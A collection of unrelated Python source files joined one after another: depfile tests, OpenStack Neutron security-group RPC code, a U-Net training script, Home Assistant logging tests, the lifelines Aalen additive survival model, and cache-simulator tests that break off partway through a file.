def _filter_boxes(self, boxes, min_size):
"""Remove all boxes with any side smaller than min_size."""
ws = boxes[:, :, 2] - boxes[:, :, 0] + 1
hs = boxes[:, :, 3] - boxes[:, :, 1] + 1
keep = ((ws >= min_size) & (hs >= min_size))
return keep
|
the-stack_106_23313 | #!/usr/bin/env python3.8
# Copyright 2021 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import unittest
import tempfile
from depfile import DepFile
class DepFileTests(unittest.TestCase):
"""Validate the depfile generation
This validates the rebasing behavior using the following imaginary set of
files::
/foo/
bar/
baz/
output
things/
input_a
input_b
input_c
Assume a CWD of /foo/bar
"""
expected = "baz/output: \\\n ../input_c \\\n things/input_a \\\n things/input_b\n"
def test_specified_cwd(self):
output = "/foo/bar/baz/output"
input_a = "/foo/bar/things/input_a"
input_b = "/foo/bar/things/input_b"
input_c = "/foo/input_c"
rebased_depfile = DepFile(output, rebase="/foo/bar")
rebased_depfile.add_input(input_a)
rebased_depfile.add_input(input_b)
rebased_depfile.update([input_b, input_c])
self.assertEqual(str(rebased_depfile), DepFileTests.expected)
def test_inferred_cwd(self):
"""Validate the standard behavior, with a mix of absolute and real paths."""
# make the output absolute (from a path relative to the cwd)
output = os.path.abspath("baz/output")
input_a = os.path.abspath("things/input_a")
input_b = "things/input_b"
input_c = os.path.abspath("../input_c")
depfile = DepFile(output)
depfile.update([input_a, input_b, input_c])
self.assertEqual(str(depfile), DepFileTests.expected)
def test_depfile_writing(self):
depfile = DepFile("/foo/bar/baz/output", rebase="/foo/bar")
depfile.update(
[
"/foo/bar/things/input_a", "/foo/bar/things/input_b",
"/foo/input_c"
])
with tempfile.TemporaryFile('w+') as outfile:
# Write out the depfile
depfile.write_to(outfile)
# Read the contents back in
outfile.seek(0)
contents = outfile.read()
self.assertEqual(contents, DepFileTests.expected)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_23314 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo.config import cfg
from neutron.common import topics
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
LOG = logging.getLogger(__name__)
SG_RPC_VERSION = "1.1"
security_group_opts = [
cfg.StrOpt(
'firewall_driver',
default='neutron.agent.firewall.NoopFirewallDriver',
help=_('Driver for Security Groups Firewall'))
]
cfg.CONF.register_opts(security_group_opts, 'SECURITYGROUP')
def is_firewall_enabled():
return (cfg.CONF.SECURITYGROUP.firewall_driver !=
'neutron.agent.firewall.NoopFirewallDriver')
def disable_security_group_extension_if_noop_driver(
supported_extension_aliases):
if not is_firewall_enabled():
LOG.debug(_('Disabled security-group extension.'))
supported_extension_aliases.remove('security-group')
class SecurityGroupServerRpcApiMixin(object):
"""A mix-in that enable SecurityGroup support in plugin rpc."""
def security_group_rules_for_devices(self, context, devices):
LOG.debug(_("Get security group rules "
"for devices via rpc %r"), devices)
return self.call(context,
self.make_msg('security_group_rules_for_devices',
devices=devices),
version=SG_RPC_VERSION,
topic=self.topic)
class SecurityGroupAgentRpcCallbackMixin(object):
"""A mix-in that enable SecurityGroup agent
support in agent implementations.
"""
#mix-in object should be have sg_agent
sg_agent = None
def security_groups_rule_updated(self, context, **kwargs):
"""Callback for security group rule update.
:param security_groups: list of updated security_groups
"""
security_groups = kwargs.get('security_groups', [])
LOG.debug(
_("Security group rule updated on remote: %s"), security_groups)
self.sg_agent.security_groups_rule_updated(security_groups)
def security_groups_member_updated(self, context, **kwargs):
"""Callback for security group member update.
:param security_groups: list of updated security_groups
"""
security_groups = kwargs.get('security_groups', [])
LOG.debug(
_("Security group member updated on remote: %s"), security_groups)
self.sg_agent.security_groups_member_updated(security_groups)
def security_groups_provider_updated(self, context, **kwargs):
"""Callback for security group provider update."""
LOG.debug(_("Provider rule updated"))
self.sg_agent.security_groups_provider_updated()
class SecurityGroupAgentRpcMixin(object):
"""A mix-in that enable SecurityGroup agent
support in agent implementations.
"""
def init_firewall(self):
firewall_driver = cfg.CONF.SECURITYGROUP.firewall_driver
LOG.debug(_("Init firewall settings (driver=%s)"), firewall_driver)
self.firewall = importutils.import_object(firewall_driver)
def prepare_devices_filter(self, device_ids):
if not device_ids:
return
LOG.info(_("Preparing filters for devices %s"), device_ids)
devices = self.plugin_rpc.security_group_rules_for_devices(
self.context, list(device_ids))
with self.firewall.defer_apply():
for device in devices.values():
self.firewall.prepare_port_filter(device)
def security_groups_rule_updated(self, security_groups):
LOG.info(_("Security group "
"rule updated %r"), security_groups)
self._security_group_updated(
security_groups,
'security_groups')
def security_groups_member_updated(self, security_groups):
LOG.info(_("Security group "
"member updated %r"), security_groups)
self._security_group_updated(
security_groups,
'security_group_source_groups')
def _security_group_updated(self, security_groups, attribute):
devices = []
sec_grp_set = set(security_groups)
for device in self.firewall.ports.values():
if sec_grp_set & set(device.get(attribute, [])):
devices.append(device)
if devices:
self.refresh_firewall(devices)
def security_groups_provider_updated(self):
LOG.info(_("Provider rule updated"))
self.refresh_firewall()
def remove_devices_filter(self, device_ids):
if not device_ids:
return
LOG.info(_("Remove device filter for %r"), device_ids)
with self.firewall.defer_apply():
for device_id in device_ids:
device = self.firewall.ports.get(device_id)
if not device:
continue
self.firewall.remove_port_filter(device)
def refresh_firewall(self, devices=None):
LOG.info(_("Refresh firewall rules"))
if devices:
device_ids = [d['device'] for d in devices]
else:
device_ids = self.firewall.ports.keys()
if not device_ids:
LOG.info(_("No ports here to refresh firewall"))
return
devices = self.plugin_rpc.security_group_rules_for_devices(
self.context, device_ids)
with self.firewall.defer_apply():
for device in devices.values():
LOG.debug(_("Update port filter for %s"), device['device'])
self.firewall.update_port_filter(device)
class SecurityGroupAgentRpcApiMixin(object):
def _get_security_group_topic(self):
return topics.get_topic_name(self.topic,
topics.SECURITY_GROUP,
topics.UPDATE)
def security_groups_rule_updated(self, context, security_groups):
"""Notify rule updated security groups."""
if not security_groups:
return
self.fanout_cast(context,
self.make_msg('security_groups_rule_updated',
security_groups=security_groups),
version=SG_RPC_VERSION,
topic=self._get_security_group_topic())
def security_groups_member_updated(self, context, security_groups):
"""Notify member updated security groups."""
if not security_groups:
return
self.fanout_cast(context,
self.make_msg('security_groups_member_updated',
security_groups=security_groups),
version=SG_RPC_VERSION,
topic=self._get_security_group_topic())
def security_groups_provider_updated(self, context):
"""Notify provider updated security groups."""
self.fanout_cast(context,
self.make_msg('security_groups_provider_updated'),
version=SG_RPC_VERSION,
topic=self._get_security_group_topic())
|
the-stack_106_23315 | import matplotlib as mpl
mpl.use('agg')
import sys
import glob
import numpy as np
import argparse
from time import time
import tensorflow as tf
from os.path import isfile
sys.path.insert(0,'../../unet/tf_unet')
import pylab as plt
from sklearn.metrics import matthews_corrcoef
from mydataprovider import UnetDataProvider as DataProvider
from tf_unet import unet
from tf_unet import util
#from IPython.display import clear_output
from utils import *
parser = argparse.ArgumentParser()
parser.add_argument('--layers', required=False, help='number of layers', type=int, default=3)
parser.add_argument('--feat', required=False, help='choose architecture', type=int, default=32)
parser.add_argument('--ws', required=False, help='time window', type=int, default=400)
parser.add_argument('--nqq', required=False, help='number of Q', type=int, default=1)
#parser.add_argument('--train', action="store_true", default=False)
parser.add_argument('--test', action="store_true", default=False)
parser.add_argument('--ntry', required=True, help='choose architecture', type=str)
args = parser.parse_args()
layers = args.layers
features_root = args.feat
ws = args.ws
nqq = args.nqq
ntry = args.ntry
files_list = sorted(glob.glob('../../data/hide/hide_sims_train/calib_1year/*.fits'))
#test_files = sorted(glob.glob('../../data/hide/hide_sims_test/calib_1month/*.fits'))
test_files = sorted(glob.glob('../../data/hide/hide_sims_valid/*.fits'))
#dpt = DataProvider(nx=ws,a_min=0, a_max=200, files=files_list)
if ntry=='1':
nnn = 5
elif ntry=='2':
nnn = 1
else:
print('WTF!')
exit()
threshold = nnn*0.6996
dpt = DataProvider(nx=ws,
files=files_list,
threshold=threshold,
sim='hide',
r_freq=300,
n_loaded=10,
a_min=0,
a_max=200,
n_class=2)
_,nx,ny,_ = dpt(1)[0].shape
training_iters = 20
epochs = 5
name = str(layers)+'_'+str(features_root)+'_'+str(nx)+'x'+str(ny)+'_try'+ntry
print(name)
model_dir = './models/hide_unet_'+name
pred_dir = 'predictions/hide_unet_'+name+'/'
ch_mkdir(pred_dir)
res_file = 'results/hide_unet_'+name
ch_mkdir('results')
qq0 = 0
if isfile(res_file+'_prop.npy'):
qq0 = np.load(res_file+'_prop.npy')
qq0 = int(qq0)
qq0 = qq0+1
print('The learning will begin from {} q number.'.format(qq0))
nqq = qq0+1
for qq in range(qq0,nqq):
print(qq)
restore = qq!=0
tf.reset_default_graph()
net = unet.Unet(channels=1,
n_class=2,
layers=layers,
features_root=features_root,
cost_kwargs=dict(regularizer=0.001))
if not restore:
print('')
n_variables = np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])
print('Number of trainable variables: {:d}'.format(n_variables))
trainer = unet.Trainer(net, batch_size=10, optimizer="momentum", opt_kwargs=dict(momentum=0.2))
path = trainer.train(dpt, model_dir,
training_iters=training_iters,
epochs=epochs,
dropout=0.5,
display_step=1000000,
restore=restore,
prediction_path = 'prediction/'+name)
prop = np.array(qq)
np.save(res_file+'_prop',prop)
if args.test:
tf.reset_default_graph()
net = unet.Unet(channels=1,
n_class=2,
layers=layers,
features_root=features_root,
cost_kwargs=dict(regularizer=0.001))
trainer = unet.Trainer(net, batch_size=10, optimizer="momentum", opt_kwargs=dict(momentum=0.2))
path = trainer.train(dpt, model_dir,
training_iters=1,
epochs=1,
dropout=0.5,
display_step=1000000,
restore=True,
prediction_path = 'prediction/'+name)
pr_list = []
roc_list = []
auc_list = []
mcc_list = []
clrs = ['b','r','g','k']
trsh = np.linspace(1,0,100,endpoint=1)
for fil in test_files:
fname = fil.split('/')[-1]
# dp = DataProvider(nx=0,a_min=0, a_max=200, files=[fil])
dp = DataProvider(nx=0,
files=[fil],
threshold=threshold,
sim='hide',
r_freq=5,
n_loaded=1,
a_min=0,
a_max=200,
n_class=2)
data,mask = dp(1)
pred,dt = net.predict(model_dir+'/model.cpkt', data,time_it=1)
_,kk,jj,_, = pred.shape
mask = util.crop_to_shape(mask, pred.shape)[:,:kk,:jj,:]
fig, (ax1,ax2,ax3) = plt.subplots(3,1,figsize=(18,8))
ax1.imshow(data[0,:,:,0],aspect='auto')
ax2.imshow(mask[0,:,:,1],aspect='auto')
ax3.imshow(pred[0,:,:,1],aspect='auto')
np.save(pred_dir+fname+'_mask',mask)
np.save(pred_dir+fname+'_pred',pred)
plt.subplots_adjust(left=0.04, right=0.99, top=0.99, bottom=0.04)
plt.savefig(pred_dir+fname+'.jpg',dpi=30)
plt.close()
y_true = mask[0,:,:,1].reshape(-1).astype(int)
y_score = pred[0,:,:,1].reshape(-1)
y_score /= y_score.max()
recall,precision = prc(y_true, y_score, trsh)
pr_list.append(np.stack([recall,precision]).T)
fpr,tpr = rocc(y_true, y_score, trsh)
roc_list.append(np.stack([fpr,tpr]).T)
auc_list.append(np.trapz(tpr, fpr))
mcc_list.append(matthews_corrcoef(y_true, y_score.round()))
np.save(res_file+'_pr',np.array(pr_list))
np.save(res_file+'_roc',np.array(roc_list))
np.save(res_file+'_mcc',np.array(mcc_list))
print(np.mean(auc_list),np.mean(mcc_list))
|
the-stack_106_23316 | """Test Home Assistant logging util methods."""
import asyncio
import logging
import queue
import pytest
import homeassistant.util.logging as logging_util
from tests.async_mock import patch
def test_sensitive_data_filter():
"""Test the logging sensitive data filter."""
log_filter = logging_util.HideSensitiveDataFilter("mock_sensitive")
clean_record = logging.makeLogRecord({"msg": "clean log data"})
log_filter.filter(clean_record)
assert clean_record.msg == "clean log data"
sensitive_record = logging.makeLogRecord({"msg": "mock_sensitive log"})
log_filter.filter(sensitive_record)
assert sensitive_record.msg == "******* log"
async def test_logging_with_queue_handler():
"""Test logging with HomeAssistantQueueHandler."""
simple_queue = queue.SimpleQueue() # type: ignore
handler = logging_util.HomeAssistantQueueHandler(simple_queue)
log_record = logging.makeLogRecord({"msg": "Test Log Record"})
handler.emit(log_record)
with pytest.raises(asyncio.CancelledError), patch.object(
handler, "enqueue", side_effect=asyncio.CancelledError
):
handler.emit(log_record)
with patch.object(handler, "emit") as emit_mock:
handler.handle(log_record)
emit_mock.assert_called_once()
with patch.object(handler, "filter") as filter_mock, patch.object(
handler, "emit"
) as emit_mock:
filter_mock.return_value = False
handler.handle(log_record)
emit_mock.assert_not_called()
with patch.object(handler, "enqueue", side_effect=OSError), patch.object(
handler, "handleError"
) as mock_handle_error:
handler.emit(log_record)
mock_handle_error.assert_called_once()
handler.close()
assert simple_queue.get_nowait().msg == "Test Log Record"
assert simple_queue.empty()
async def test_migrate_log_handler(hass):
"""Test migrating log handlers."""
logging_util.async_activate_log_queue_handler(hass)
assert len(logging.root.handlers) == 1
assert isinstance(logging.root.handlers[0], logging_util.HomeAssistantQueueHandler)
@pytest.mark.no_fail_on_log_exception
async def test_async_create_catching_coro(hass, caplog):
"""Test exception logging of wrapped coroutine."""
async def job():
raise Exception("This is a bad coroutine")
hass.async_create_task(logging_util.async_create_catching_coro(job()))
await hass.async_block_till_done()
assert "This is a bad coroutine" in caplog.text
assert "in test_async_create_catching_coro" in caplog.text
|
the-stack_106_23318 | # -*- coding: utf-8 -*-
import warnings
from datetime import datetime
import time
import numpy as np
import pandas as pd
from numpy.linalg import LinAlgError
from scipy.integrate import trapz
from lifelines.fitters import BaseFitter
from lifelines.utils import (
_get_index,
inv_normal_cdf,
epanechnikov_kernel,
ridge_regression as lr,
qth_survival_times,
check_for_numeric_dtypes_or_raise,
concordance_index,
check_nans_or_infs,
ConvergenceWarning,
normalize,
string_justify,
_to_list,
format_floats,
format_p_value,
format_exp_floats,
survival_table_from_events,
StatisticalWarning,
CensoringType,
)
from lifelines.plotting import set_kwargs_ax
class AalenAdditiveFitter(BaseFitter):
r"""
This class fits the regression model:
.. math:: h(t|x) = b_0(t) + b_1(t) x_1 + ... + b_N(t) x_N
that is, the hazard rate is a linear function of the covariates with time-varying coefficients.
This implementation assumes non-time-varying covariates, see ``TODO: name``
Note
-----
This class was rewritten in lifelines 0.17.0 to focus solely on static datasets.
There is no guarantee of backwards compatibility.
Parameters
-----------
fit_intercept: bool, optional (default: True)
If False, do not attach an intercept (column of ones) to the covariate matrix. The
intercept, :math:`b_0(t)` acts as a baseline hazard.
alpha: float, optional (default=0.05)
the level in the confidence intervals.
coef_penalizer: float, optional (default: 0)
Attach a L2 penalizer to the size of the coefficients during regression. This improves
stability of the estimates and controls for high correlation between covariates.
For example, this shrinks the absolute value of :math:`c_{i,t}`.
smoothing_penalizer: float, optional (default: 0)
Attach a L2 penalizer to difference between adjacent (over time) coefficients. For
example, this shrinks the absolute value of :math:`c_{i,t} - c_{i,t+1}`.
Attributes
----------
cumulative_hazards_ : DataFrame
The estimated cumulative hazard
hazards_ : DataFrame
The estimated hazards
confidence_intervals_ : DataFrame
The lower and upper confidence intervals for the cumulative hazard
durations: array
The durations provided
event_observed: array
The event_observed variable provided
weights: array
The event_observed variable provided
"""
def __init__(self, fit_intercept=True, alpha=0.05, coef_penalizer=0.0, smoothing_penalizer=0.0):
super(AalenAdditiveFitter, self).__init__(alpha=alpha)
self.fit_intercept = fit_intercept
self.alpha = alpha
self.coef_penalizer = coef_penalizer
self.smoothing_penalizer = smoothing_penalizer
if not (0 < alpha <= 1.0):
raise ValueError("alpha parameter must be between 0 and 1.")
if coef_penalizer < 0 or smoothing_penalizer < 0:
raise ValueError("penalizer parameters must be >= 0.")
@CensoringType.right_censoring
def fit(self, df, duration_col, event_col=None, weights_col=None, show_progress=False):
"""
Parameters
----------
Fit the Aalen Additive model to a dataset.
Parameters
----------
df: DataFrame
a Pandas DataFrame with necessary columns `duration_col` and
`event_col` (see below), covariates columns, and special columns (weights).
`duration_col` refers to
the lifetimes of the subjects. `event_col` refers to whether
the 'death' events was observed: 1 if observed, 0 else (censored).
duration_col: string
the name of the column in DataFrame that contains the subjects'
lifetimes.
event_col: string, optional
the name of the column in DataFrame that contains the subjects' death
observation. If left as None, assume all individuals are uncensored.
weights_col: string, optional
an optional column in the DataFrame, df, that denotes the weight per subject.
This column is expelled and not used as a covariate, but as a weight in the
final regression. Default weight is 1.
This can be used for case-weights. For example, a weight of 2 means there were two subjects with
identical observations.
This can be used for sampling weights.
show_progress: boolean, optional (default=False)
Since the fitter is iterative, show iteration number.
Returns
-------
self: AalenAdditiveFitter
self with additional new properties: ``cumulative_hazards_``, etc.
Examples
--------
>>> from lifelines import AalenAdditiveFitter
>>>
>>> df = pd.DataFrame({
>>> 'T': [5, 3, 9, 8, 7, 4, 4, 3, 2, 5, 6, 7],
>>> 'E': [1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0],
>>> 'var': [0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2],
>>> 'age': [4, 3, 9, 8, 7, 4, 4, 3, 2, 5, 6, 7],
>>> })
>>>
>>> aaf = AalenAdditiveFitter()
>>> aaf.fit(df, 'T', 'E')
>>> aaf.predict_median(df)
>>> aaf.print_summary()
"""
self._time_fit_was_called = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S") + " UTC"
df = df.copy()
self.duration_col = duration_col
self.event_col = event_col
self.weights_col = weights_col
self._n_examples = df.shape[0]
X, T, E, weights = self._preprocess_dataframe(df)
self.durations = T.copy()
self.event_observed = E.copy()
self.weights = weights.copy()
self._norm_std = X.std(0)
# if we included an intercept, we need to fix not divide by zero.
if self.fit_intercept:
self._norm_std["_intercept"] = 1.0
else:
# a _intercept was provided
self._norm_std[self._norm_std < 1e-8] = 1.0
self.hazards_, self.cumulative_hazards_, self.cumulative_variance_ = self._fit_model(
normalize(X, 0, self._norm_std), T, E, weights, show_progress
)
self.hazards_ /= self._norm_std
self.cumulative_hazards_ /= self._norm_std
self.cumulative_variance_ /= self._norm_std
self.confidence_intervals_ = self._compute_confidence_intervals()
self._index = self.hazards_.index
self._predicted_hazards_ = self.predict_cumulative_hazard(X).iloc[-1].values.ravel()
return self
def _fit_model(self, X, T, E, weights, show_progress):
columns = X.columns
index = np.sort(np.unique(T[E]))
hazards_, variance_hazards_, stop = self._fit_model_to_data_batch(
X.values, T.values, E.values, weights.values, show_progress
)
hazards = pd.DataFrame(hazards_, columns=columns, index=index).iloc[:stop]
cumulative_hazards_ = hazards.cumsum()
cumulative_variance_hazards_ = (
pd.DataFrame(variance_hazards_, columns=columns, index=index).iloc[:stop].cumsum()
)
return hazards, cumulative_hazards_, cumulative_variance_hazards_
def _fit_model_to_data_batch(self, X, T, E, weights, show_progress):
n, d = X.shape
# we are mutating values of X, so copy it.
X = X.copy()
# iterate over all the unique death times
unique_death_times = np.sort(np.unique(T[E]))
n_deaths = unique_death_times.shape[0]
total_observed_exits = 0
hazards_ = np.zeros((n_deaths, d))
variance_hazards_ = np.zeros((n_deaths, d))
v = np.zeros(d)
start = time.time()
W = np.sqrt(weights)
X = W[:, None] * X
for i, t in enumerate(unique_death_times):
exits = T == t
deaths = exits & E
try:
v, V = lr(X, W * deaths, c1=self.coef_penalizer, c2=self.smoothing_penalizer, offset=v, ix=deaths)
except LinAlgError:
warnings.warn(
"Linear regression error at index=%d, time=%.3f. Try increasing the coef_penalizer value." % (i, t),
ConvergenceWarning,
)
v = np.zeros_like(v)
V = np.zeros_like(V)
hazards_[i, :] = v
variance_hazards_[i, :] = (V ** 2).sum(1)
X[exits, :] = 0
if show_progress and i % int((n_deaths / 10)) == 0:
print("\rIteration %d/%d, seconds_since_start = %.2f" % (i + 1, n_deaths, time.time() - start), end="")
last_iteration = i + 1
# terminate early when there are less than (3 * d) subjects left, where d does not include the intercept.
# the value 3 if from R survival lib.
if (3 * (d - 1)) >= n - total_observed_exits:
if show_progress:
print("Terminating early due to too few subjects remaining. This is expected behaviour.")
break
total_observed_exits += exits.sum()
if show_progress:
print("Convergence completed.")
return hazards_, variance_hazards_, last_iteration
def _preprocess_dataframe(self, df):
n, _ = df.shape
df = df.sort_values(by=self.duration_col)
# Extract time and event
T = df.pop(self.duration_col)
E = df.pop(self.event_col) if (self.event_col is not None) else pd.Series(np.ones(n), index=df.index, name="E")
W = (
df.pop(self.weights_col)
if (self.weights_col is not None)
else pd.Series(np.ones((n,)), index=df.index, name="weights")
)
# check to make sure their weights are okay
if self.weights_col:
if (W.astype(int) != W).any():
warnings.warn(
"""It appears your weights are not integers, possibly propensity or sampling scores then?
It's important to know that the naive variance estimates of the coefficients are biased."
""",
StatisticalWarning,
)
if (W <= 0).any():
raise ValueError("values in weight column %s must be positive." % self.weights_col)
X = df.astype(float)
T = T.astype(float)
check_nans_or_infs(E)
E = E.astype(bool)
self._check_values(df, T, E)
if self.fit_intercept:
assert (
"_intercept" not in df.columns
), "_intercept is an internal lifelines column, please rename your column first."
X["_intercept"] = 1.0
return X, T, E, W
def predict_cumulative_hazard(self, X):
"""
Returns the hazard rates for the individuals
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame. If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
"""
n = X.shape[0]
X = X.astype(float)
cols = _get_index(X)
if isinstance(X, pd.DataFrame):
order = self.cumulative_hazards_.columns
order = order.drop("_intercept") if self.fit_intercept else order
X_ = X[order].values
elif isinstance(X, pd.Series):
return self.predict_cumulative_hazard(X.to_frame().T)
else:
X_ = X
X_ = X_ if not self.fit_intercept else np.c_[X_, np.ones((n, 1))]
timeline = self._index
individual_cumulative_hazards_ = pd.DataFrame(
np.dot(self.cumulative_hazards_, X_.T), index=timeline, columns=cols
)
return individual_cumulative_hazards_
def _check_values(self, X, T, E):
check_for_numeric_dtypes_or_raise(X)
check_nans_or_infs(T)
check_nans_or_infs(X)
def predict_survival_function(self, X, times=None):
"""
Returns the survival functions for the individuals
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
times:
Not implemented yet
"""
return np.exp(-self.predict_cumulative_hazard(X))
def predict_percentile(self, X, p=0.5):
"""
Returns the median lifetimes for the individuals.
http://stats.stackexchange.com/questions/102986/percentile-loss-functions
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
p: float
default: 0.5
"""
index = _get_index(X)
return qth_survival_times(p, self.predict_survival_function(X)[index]).T
def predict_median(self, X):
"""
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
Returns the median lifetimes for the individuals
"""
return self.predict_percentile(X, 0.5)
def predict_expectation(self, X):
"""
Compute the expected lifetime, E[T], using covariates X.
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
Returns the expected lifetimes for the individuals
"""
index = _get_index(X)
t = self._index
return pd.DataFrame(trapz(self.predict_survival_function(X)[index].values.T, t), index=index)
def _compute_confidence_intervals(self):
ci = 100 * (1 - self.alpha)
z = inv_normal_cdf(1 - self.alpha / 2)
std_error = np.sqrt(self.cumulative_variance_)
return pd.concat(
{
"%g%% lower-bound" % ci: self.cumulative_hazards_ - z * std_error,
"%g%% upper-bound" % ci: self.cumulative_hazards_ + z * std_error,
}
)
def plot(self, columns=None, loc=None, iloc=None, **kwargs):
""""
A wrapper around plotting. Matplotlib plot arguments can be passed in, plus:
Parameters
-----------
columns: string or list-like, optional
If not empty, plot a subset of columns from the ``cumulative_hazards_``. Default all.
loc:
iloc: slice, optional
specify a location-based subsection of the curves to plot, ex:
``.plot(iloc=slice(0,10))`` will plot the first 10 time points.
"""
from matplotlib import pyplot as plt
assert loc is None or iloc is None, "Cannot set both loc and iloc in call to .plot"
def shaded_plot(ax, x, y, y_upper, y_lower, **kwargs):
base_line, = ax.plot(x, y, drawstyle="steps-post", **kwargs)
ax.fill_between(x, y_lower, y2=y_upper, alpha=0.25, color=base_line.get_color(), linewidth=1.0, step="post")
def create_df_slicer(loc, iloc):
get_method = "loc" if loc is not None else "iloc"
if iloc is None and loc is None:
user_submitted_ix = slice(0, None)
else:
user_submitted_ix = loc if loc is not None else iloc
return lambda df: getattr(df, get_method)[user_submitted_ix]
subset_df = create_df_slicer(loc, iloc)
if not columns:
columns = self.cumulative_hazards_.columns
else:
columns = _to_list(columns)
set_kwargs_ax(kwargs)
ax = kwargs.pop("ax")
x = subset_df(self.cumulative_hazards_).index.values.astype(float)
for column in columns:
ci = (1 - self.alpha) * 100
y = subset_df(self.cumulative_hazards_[column]).values
index = subset_df(self.cumulative_hazards_[column]).index
y_upper = subset_df(self.confidence_intervals_[column].loc["%g%% upper-bound" % ci]).values
y_lower = subset_df(self.confidence_intervals_[column].loc["%g%% lower-bound" % ci]).values
shaded_plot(ax, x, y, y_upper, y_lower, label=column, **kwargs)
plt.hlines(0, index.min() - 1, index.max(), color="k", linestyles="--", alpha=0.5)
ax.legend()
return ax
def smoothed_hazards_(self, bandwidth=1):
"""
Using the epanechnikov kernel to smooth the hazard function, with sigma/bandwidth
"""
timeline = self._index.values
return pd.DataFrame(
np.dot(epanechnikov_kernel(timeline[:, None], timeline, bandwidth), self.hazards_.values),
columns=self.hazards_.columns,
index=timeline,
)
@property
def score_(self):
"""
The concordance score (also known as the c-index) of the fit. The c-index is a generalization of the ROC AUC
to survival data, including censorships.
For this purpose, the ``score_`` is a measure of the predictive accuracy of the fitted model
onto the training dataset. It's analogous to the R^2 in linear models.
"""
# pylint: disable=access-member-before-definition
if hasattr(self, "_predicted_hazards_"):
self._concordance_score_ = concordance_index(self.durations, -self._predicted_hazards_, self.event_observed)
del self._predicted_hazards_
return self._concordance_score_
return self._concordance_score_
def _compute_slopes(self):
def _univariate_linear_regression_without_intercept(X, Y, weights):
# normally (weights * X).dot(Y) / X.dot(weights * X), but we have a slightly different form here.
beta = X.dot(Y) / X.dot(weights * X)
errors = Y.values - np.outer(X, beta)
var = (errors ** 2).sum(0) / (Y.shape[0] - 2) / X.dot(weights * X)
return beta, np.sqrt(var)
weights = survival_table_from_events(self.durations, self.event_observed).loc[self._index, "at_risk"].values
y = (weights[:, None] * self.hazards_).cumsum()
X = self._index.values
betas, se = _univariate_linear_regression_without_intercept(X, y, weights)
return pd.Series(betas, index=y.columns), pd.Series(se, index=y.columns)
@property
def summary(self):
"""Summary statistics describing the fit.
Returns
-------
df : DataFrame
"""
df = pd.DataFrame(index=self.cumulative_hazards_.columns)
betas, se = self._compute_slopes()
df["slope(coef)"] = betas
df["se(slope(coef))"] = se
return df
def print_summary(self, decimals=2, **kwargs):
"""
Print summary statistics describing the fit, the coefficients, and the error bounds.
Parameters
-----------
decimals: int, optional (default=2)
specify the number of decimal places to show
kwargs:
print additional meta data in the output (useful to provide model names, dataset names, etc.) when comparing
multiple outputs.
"""
# Print information about data first
justify = string_justify(18)
print(self)
print("{} = '{}'".format(justify("duration col"), self.duration_col))
print("{} = '{}'".format(justify("event col"), self.event_col))
if self.weights_col:
print("{} = '{}'".format(justify("weights col"), self.weights_col))
if self.coef_penalizer > 0:
print("{} = '{}'".format(justify("coef penalizer"), self.coef_penalizer))
if self.smoothing_penalizer > 0:
print("{} = '{}'".format(justify("smoothing penalizer"), self.smoothing_penalizer))
print("{} = {}".format(justify("number of subjects"), self._n_examples))
print("{} = {}".format(justify("number of events"), self.event_observed.sum()))
print("{} = {}".format(justify("time fit was run"), self._time_fit_was_called))
for k, v in kwargs.items():
print("{} = {}\n".format(justify(k), v))
print(end="\n")
print("---")
df = self.summary
print(
df.to_string(
float_format=format_floats(decimals),
formatters={"p": format_p_value(decimals), "exp(coef)": format_exp_floats(decimals)},
)
)
# Significance code explanation
print("---")
print("Concordance = {:.{prec}f}".format(self.score_, prec=decimals))
|
the-stack_106_23319 | #!/usr/bin/env python3
import copy
import nose.tools as nose
from cachesimulator.cache import Cache
class TestSetBlock(object):
"""set_block should behave correctly in all cases"""
def reset(self):
self.cache = Cache({
'010': [
{'tag': '1000'},
{'tag': '1100'},
{'tag': '1101'},
{'tag': '1110'}
]
})
self.recently_used_addrs = [
('100', '1100'),
('010', '1101'),
('010', '1110')
]
self.new_entry = {'tag': '1111'}
def test_empty_set(self):
"""set_block should add new block if index set is empty"""
self.reset()
self.cache['010'][:] = []
self.cache.recently_used_addrs = []
self.cache.set_block(
replacement_policy='lru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_equal(self.cache, {
'010': [{'tag': '1111'}]
})
def test_lru_replacement(self):
"""set_block should perform LRU replacement as needed"""
self.reset()
self.cache.recently_used_addrs = self.recently_used_addrs
self.cache.set_block(
replacement_policy='lru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_equal(self.cache, {
'010': [
{'tag': '1000'},
{'tag': '1100'},
{'tag': '1111'},
{'tag': '1110'}
]
})
def test_mru_replacement(self):
"""set_block should optionally perform MRU replacement as needed"""
self.reset()
self.cache.recently_used_addrs = self.recently_used_addrs
self.cache.set_block(
replacement_policy='mru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_equal(self.cache, {
'010': [
{'tag': '1000'},
{'tag': '1100'},
{'tag': '1101'},
{'tag': '1111'}
